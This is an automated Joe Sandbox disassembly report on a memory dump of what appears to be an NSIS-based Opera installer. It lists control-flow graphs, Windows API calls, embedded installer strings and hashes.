403ada-403b04 wsprintfW call 4066df 114->116 120 403b06-403b0b call 405bf6 116->120 121 403b0d call 405c50 116->121 124 403b12-403b14 120->124 121->124 126 403b50-403b6f SetCurrentDirectoryW call 406462 CopyFileW 124->126 127 403b16-403b20 GetFileAttributesW 124->127 135 403b71-403b92 call 406462 call 4066df call 405c85 126->135 136 403bae 126->136 128 403b41-403b4c 127->128 129 403b22-403b2b DeleteFileW 127->129 128->114 132 403b4e 128->132 129->128 131 403b2d-403b3f call 405dae 129->131 131->116 131->128 132->66 144 403b94-403b9e 135->144 145 403bd8-403be4 CloseHandle 135->145 136->66 144->136 146 403ba0-403ba8 call 4069ff 144->146 145->136 146->116 146->136
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32 ref: 00403688
                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004036B3
                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036C6
                                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040375F
                                                                                                                                              • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040379C
                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 004037A3
                                                                                                                                              • SHGetFileInfoW.SHELL32(00432708,00000000,?,000002B4,00000000), ref: 004037C2
                                                                                                                                              • GetCommandLineW.KERNEL32(00464260,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037D7
                                                                                                                                              • CharNextW.USER32(00000000,004BD000,00000020,004BD000,00000000,?,00000008,0000000A,0000000C), ref: 00403810
                                                                                                                                              • GetTempPathW.KERNEL32(00002000,004D1000,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403948
                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(004D1000,00001FFB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                                                                                                              • lstrcatW.KERNEL32(004D1000,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403965
                                                                                                                                              • GetTempPathW.KERNEL32(00001FFC,004D1000,004D1000,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403979
                                                                                                                                              • lstrcatW.KERNEL32(004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403981
                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,004D1000,004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403992
                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,004D1000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040399A
                                                                                                                                              • DeleteFileW.KERNEL32(004CD000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004039AE
                                                                                                                                              • lstrlenW.KERNEL32(004D1000,004BD000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A87
                                                                                                                                                • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                                                                                                              • wsprintfW.USER32 ref: 00403AE4
                                                                                                                                              • GetFileAttributesW.KERNEL32(00481000,004D1000), ref: 00403B17
                                                                                                                                              • DeleteFileW.KERNEL32(00481000), ref: 00403B23
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004D1000,004D1000), ref: 00403B51
                                                                                                                                                • Part of subcall function 00406462: MoveFileExW.KERNEL32(?,?,00000005,00405F60,?,00000000,000000F1,?,?,?,?,?), ref: 0040646C
                                                                                                                                              • CopyFileW.KERNEL32(004D9000,00481000,00000001,004D1000,00000000), ref: 00403B67
                                                                                                                                                • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                                • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                                • Part of subcall function 004069FF: FindFirstFileW.KERNEL32(76F93420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0), ref: 00406A0A
                                                                                                                                                • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
                                                                                                                                              • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB0
                                                                                                                                              • CoUninitialize.COMBASE(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB5
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403BD2
                                                                                                                                              • CloseHandle.KERNEL32(00000000,00485000,00485000,?,00481000,00000000), ref: 00403BD9
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BF5
                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BFC
                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C11
                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C34
                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C59
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403C7C
                                                                                                                                                • Part of subcall function 00405C50: CreateDirectoryW.KERNEL32(?,00000000,00403658,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                              • API String ID: 2017177436-2502969717
                                                                                                                                              • Opcode ID: 3d671764197dcef63dc7c2a13f67f50788250ee6bdde08026161d1f705c381d7
                                                                                                                                              • Instruction ID: d5dd5e0f9c74a08960ebc8aa75e9a138e3a42fd8f19371cc0c5244fd25c86c9d
                                                                                                                                              • Opcode Fuzzy Hash: 3d671764197dcef63dc7c2a13f67f50788250ee6bdde08026161d1f705c381d7
                                                                                                                                              • Instruction Fuzzy Hash: 56F108316043019AD720AF769D45B2B7AE8EF4174AF10883EF581B22D1DB7CDA45CB6E

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 296 405dae-405dd4 call 406079 299 405dd6-405de8 DeleteFileW 296->299 300 405ded-405df4 296->300 301 405f6a-405f6e 299->301 302 405df6-405df8 300->302 303 405e07-405e17 call 4066a2 300->303 304 405f18-405f1d 302->304 305 405dfe-405e01 302->305 309 405e26-405e27 call 405fbd 303->309 310 405e19-405e24 lstrcatW 303->310 304->301 308 405f1f-405f22 304->308 305->303 305->304 311 405f24-405f2a 308->311 312 405f2c-405f34 call 4069ff 308->312 313 405e2c-405e30 309->313 310->313 311->301 312->301 320 405f36-405f4a call 405f71 call 405d66 312->320 316 405e32-405e3a 313->316 317 405e3c-405e42 lstrcatW 313->317 316->317 319 405e47-405e63 lstrlenW FindFirstFileW 316->319 317->319 321 405e69-405e71 319->321 322 405f0d-405f11 319->322 336 405f62-405f65 call 405727 320->336 337 405f4c-405f4f 320->337 325 405e91-405ea5 call 4066a2 321->325 326 405e73-405e7b 321->326 322->304 324 405f13 322->324 324->304 338 405ea7-405eaf 325->338 339 405ebc-405ec7 call 405d66 325->339 328 405ef0-405f00 FindNextFileW 326->328 329 405e7d-405e85 326->329 328->321 332 405f06-405f07 FindClose 328->332 329->325 333 405e87-405e8f 329->333 332->322 333->325 333->328 336->301 337->311 343 405f51-405f60 call 405727 call 406462 337->343 338->328 340 405eb1-405eba call 405dae 338->340 349 405ee8-405eeb call 405727 339->349 350 405ec9-405ecc 339->350 340->328 343->301 349->328 352 405ee0-405ee6 350->352 353 405ece-405ede call 405727 call 406462 350->353 352->328 353->328
                                                                                                                                              APIs
                                                                                                                                              • DeleteFileW.KERNEL32(?,?,76F93420,76F92EE0,004BD000), ref: 00405DD7
                                                                                                                                              • lstrcatW.KERNEL32(00452750,\*.*,00452750,?,?,76F93420,76F92EE0,004BD000), ref: 00405E1F
                                                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00452750,?,?,76F93420,76F92EE0,004BD000), ref: 00405E42
                                                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00452750,?,?,76F93420,76F92EE0,004BD000), ref: 00405E48
                                                                                                                                              • FindFirstFileW.KERNEL32(00452750,?,?,?,0040A014,?,00452750,?,?,76F93420,76F92EE0,004BD000), ref: 00405E58
                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EF8
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405F07
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                              • String ID: P'E$\*.*
                                                                                                                                              • API String ID: 2035342205-897026672
                                                                                                                                              • Opcode ID: 2a22b74e29257ee4312f2694a2476e0e063d7e13d36b91b3edff1e0c18e84ae8
                                                                                                                                              • Instruction ID: d3f7042800757c758c726763e218659af4e34a2018f279a2393577cf1f32b1c8
                                                                                                                                              • Opcode Fuzzy Hash: 2a22b74e29257ee4312f2694a2476e0e063d7e13d36b91b3edff1e0c18e84ae8
                                                                                                                                              • Instruction Fuzzy Hash: 5741D130800A05E6CB21AB61CD89ABF7678EF45755F14413FF881B11D1DB7C8A82DEAE

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 470 406dc0-406dc5 471 406e36-406e54 470->471 472 406dc7-406df6 470->472 475 40742c-407441 471->475 473 406df8-406dfb 472->473 474 406dfd-406e01 472->474 476 406e0d-406e10 473->476 477 406e03-406e07 474->477 478 406e09 474->478 479 407443-407459 475->479 480 40745b-407471 475->480 481 406e12-406e1b 476->481 482 406e2e-406e31 476->482 477->476 478->476 483 407474-40747b 479->483 480->483 486 406e20-406e2c 481->486 487 406e1d 481->487 488 407003-407021 482->488 484 4074a2-4074ae 483->484 485 40747d-407481 483->485 497 406c44-406c4d 484->497 489 407630-40763a 485->489 490 407487-40749f 485->490 494 406e96-406ec4 486->494 487->486 492 407023-407037 488->492 493 407039-40704b 488->493 499 407646-407659 489->499 490->484 498 40704e-407058 492->498 493->498 495 406ee0-406efa 494->495 496 406ec6-406ede 494->496 500 406efd-406f07 495->500 496->500 501 406c53 497->501 502 40765b 497->502 503 40705a 498->503 504 406ffb-407001 498->504 505 40765e-407662 499->505 507 406f0d 500->507 508 406e7e-406e84 500->508 509 406c5a-406c5e 501->509 510 406d9a-406dbb 501->510 511 406cff-406d03 501->511 512 406d6f-406d73 501->512 502->505 513 406fd6-406fda 503->513 514 40716b-407178 503->514 504->488 506 406f9f-406fa9 504->506 522 4075ee-4075f8 506->522 523 406faf-406fd1 506->523 529 406e63-406e7b 507->529 530 4075ca-4075d4 507->530 524 406f37-406f3d 508->524 525 406e8a-406e90 508->525 509->499 518 406c64-406c71 509->518 510->475 526 406d09-406d22 511->526 527 4075af-4075b9 511->527 520 406d79-406d8d 512->520 521 4075be-4075c8 512->521 515 406fe0-406ff8 513->515 516 4075e2-4075ec 513->516 514->497 519 4071c7-4071d6 514->519 515->504 516->499 518->502 528 406c77-406cbd 518->528 519->475 534 406d90-406d98 520->534 521->499 522->499 523->514 531 406f9b 524->531 533 406f3f-406f5d 524->533 525->494 525->531 532 406d25-406d29 526->532 527->499 536 406ce5-406ce7 528->536 537 406cbf-406cc3 528->537 529->508 530->499 531->506 532->511 535 406d2b-406d31 532->535 538 406f75-406f87 533->538 539 406f5f-406f73 533->539 534->510 534->512 544 406d33-406d3a 535->544 545 406d5b-406d6d 535->545 542 406cf5-406cfd 536->542 543 406ce9-406cf3 536->543 540 406cc5-406cc8 GlobalFree 537->540 541 406cce-406cdc GlobalAlloc 537->541 546 406f8a-406f94 538->546 539->546 540->541 541->502 549 406ce2 541->549 542->532 543->542 543->543 547 406d45-406d55 GlobalAlloc 544->547 548 406d3c-406d3f GlobalFree 544->548 545->534 546->524 550 406f96 546->550 547->502 547->545 548->547 549->536 552 4075d6-4075e0 550->552 553 406f1c-406f34 550->553 552->499 553->524
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                                                                                                              • Instruction ID: 2c84522690a72e7b125efbdd79dcce5a6d58b8fc95eff680b6a5e34cc787ad25
                                                                                                                                              • Opcode Fuzzy Hash: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                                                                                                              • Instruction Fuzzy Hash: 5EF17670D04229CBDF28CFA8C8946ADBBB1FF44305F24856ED456BB281D7786A86CF45
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileW.KERNEL32(76F93420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0), ref: 00406A0A
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406A16
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                              • Opcode ID: c678162996fe6daf9e8ab4f1fec6b2103351496eed0ed7f1d1f24d988285780e
                                                                                                                                              • Instruction ID: 35f0ff7019ed0dad564a4e6eb4f1dd92456e0906ec704515d4596d21edce6ab9
                                                                                                                                              • Opcode Fuzzy Hash: c678162996fe6daf9e8ab4f1fec6b2103351496eed0ed7f1d1f24d988285780e
                                                                                                                                              • Instruction Fuzzy Hash: EDD012317551205BC241A73C6D0C89B7E589F1A3317118B37F46BF21E4D7348C628A9D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 149 403d74-403d8c call 406a96 152 403da0-403dd7 call 406570 149->152 153 403d8e-403d9e call 4065e9 149->153 158 403dd9-403dea call 406570 152->158 159 403def-403df5 lstrcatW 152->159 162 403dfa-403e23 call 40404a call 406079 153->162 158->159 159->162 167 403eb5-403ebd call 406079 162->167 168 403e29-403e2e 162->168 174 403ecb-403ef0 LoadImageW 167->174 175 403ebf-403ec6 call 4066df 167->175 168->167 169 403e34-403e5c call 406570 168->169 169->167 176 403e5e-403e62 169->176 178 403f71-403f79 call 40140b 174->178 179 403ef2-403f22 RegisterClassW 174->179 175->174 180 403e74-403e80 lstrlenW 176->180 181 403e64-403e71 call 405f9e 176->181 190 403f83-403f8e call 40404a 178->190 191 403f7b-403f7e 178->191 182 404040 179->182 183 403f28-403f6c SystemParametersInfoW CreateWindowExW 179->183 187 403e82-403e90 lstrcmpiW 180->187 188 403ea8-403eb0 call 405f71 call 4066a2 180->188 181->180 186 404042-404049 182->186 183->178 187->188 194 403e92-403e9c GetFileAttributesW 187->194 188->167 202 403f94-403fae ShowWindow call 406a26 190->202 203 404017-40401f call 4057fa 190->203 191->186 197 403ea2-403ea3 call 405fbd 194->197 198 403e9e-403ea0 194->198 197->188 198->188 198->197 210 403fb0-403fb5 call 406a26 202->210 211 403fba-403fcc GetClassInfoW 202->211 208 404021-404027 203->208 209 404039-40403b call 40140b 203->209 208->191 212 40402d-404034 call 40140b 208->212 209->182 210->211 215 403fe4-404015 DialogBoxParamW call 40140b call 403cc4 211->215 216 403fce-403fde GetClassInfoW RegisterClassW 211->216 212->191 215->186 216->215
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00406A96: GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                                                                                                                • Part of subcall function 00406A96: GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                                                                                                              • lstrcatW.KERNEL32(004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000,00000002,76F93420,004D1000,00000000,004BD000,00008001), ref: 00403DF5
                                                                                                                                              • lstrlenW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,?,?,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00000000,004C1000,004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000,00000002,76F93420), ref: 00403E75
                                                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,?,?,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00000000,004C1000,004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000), ref: 00403E88
                                                                                                                                              • GetFileAttributesW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0), ref: 00403E93
                                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C1000), ref: 00403EDC
                                                                                                                                                • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                                                                                                              • RegisterClassW.USER32(00464200), ref: 00403F19
                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F31
                                                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F66
                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403F9C
                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00464200), ref: 00403FC8
                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00464200), ref: 00403FD5
                                                                                                                                              • RegisterClassW.USER32(00464200), ref: 00403FDE
                                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00404122,00000000), ref: 00403FFD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                              • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$H'D$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                              • API String ID: 1975747703-406167329
                                                                                                                                              • Opcode ID: 3d59189b7d584aebec317020681a23c8595c56b901d309db355d32037134d7fc
                                                                                                                                              • Instruction ID: 15514f3cea8a7976e0aa4835bc9f56462f0e59a4e5397df6ef3051f83c2bc2bc
                                                                                                                                              • Opcode Fuzzy Hash: 3d59189b7d584aebec317020681a23c8595c56b901d309db355d32037134d7fc
                                                                                                                                              • Instruction Fuzzy Hash: 3C61E770640301BED720AF669D95F273AACEB85B49F10457FF941B22E2DB7D58018A2E

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 223 4030f5-403143 GetTickCount GetModuleFileNameW call 406192 226 403145-40314a 223->226 227 40314f-40317d call 4066a2 call 405fbd call 4066a2 GetFileSize 223->227 228 40338f-403393 226->228 235 403183 227->235 236 403268-403276 call 403053 227->236 238 403188-40319f 235->238 242 403347-40334c 236->242 243 40327c-40327f 236->243 240 4031a1 238->240 241 4031a3-4031ac call 403607 238->241 240->241 248 4031b2-4031b9 241->248 249 403303-40330b call 403053 241->249 242->228 246 403281-403299 call 40361d call 403607 243->246 247 4032ab-4032f7 GlobalAlloc call 406bf1 call 4061c1 CreateFileW 243->247 246->242 270 40329f-4032a5 246->270 274 4032f9-4032fe 247->274 275 40330d-40333d call 40361d call 403396 247->275 252 403235-403239 248->252 253 4031bb-4031cf call 40614d 248->253 249->242 260 403243-403249 252->260 261 40323b-403242 call 403053 252->261 253->260 272 4031d1-4031d8 253->272 265 403258-403260 260->265 266 40324b-403255 call 406b83 260->266 261->260 265->238 273 403266 265->273 266->265 270->242 270->247 272->260 277 4031da-4031e1 272->277 273->236 274->228 284 403342-403345 275->284 277->260 279 4031e3-4031ea 277->279 279->260 281 4031ec-4031f3 279->281 281->260 283 4031f5-403215 281->283 283->242 286 40321b-40321f 283->286 284->242 285 40334e-40335f 284->285 287 403361 285->287 288 403367-40336c 285->288 289 403221-403225 286->289 290 403227-40322f 286->290 287->288 291 40336d-403373 288->291 289->273 289->290 290->260 292 403231-403233 290->292 291->291 293 403375-40338d call 40614d 291->293 292->260 293->228
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403109
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004D9000,00002000), ref: 00403125
                                                                                                                                                • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
                                                                                                                                                • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004DD000,00000000,004C9000,004C9000,004D9000,004D9000,80000000,00000003), ref: 0040316E
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00008001), ref: 004032B0
                                                                                                                                              Strings
                                                                                                                                              • Error launching installer, xrefs: 00403145
                                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032F9
                                                                                                                                              • Null, xrefs: 004031EC
                                                                                                                                              • soft, xrefs: 004031E3
                                                                                                                                              • hA, xrefs: 004032B6
                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403347
                                                                                                                                              • Inst, xrefs: 004031DA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$hA$soft
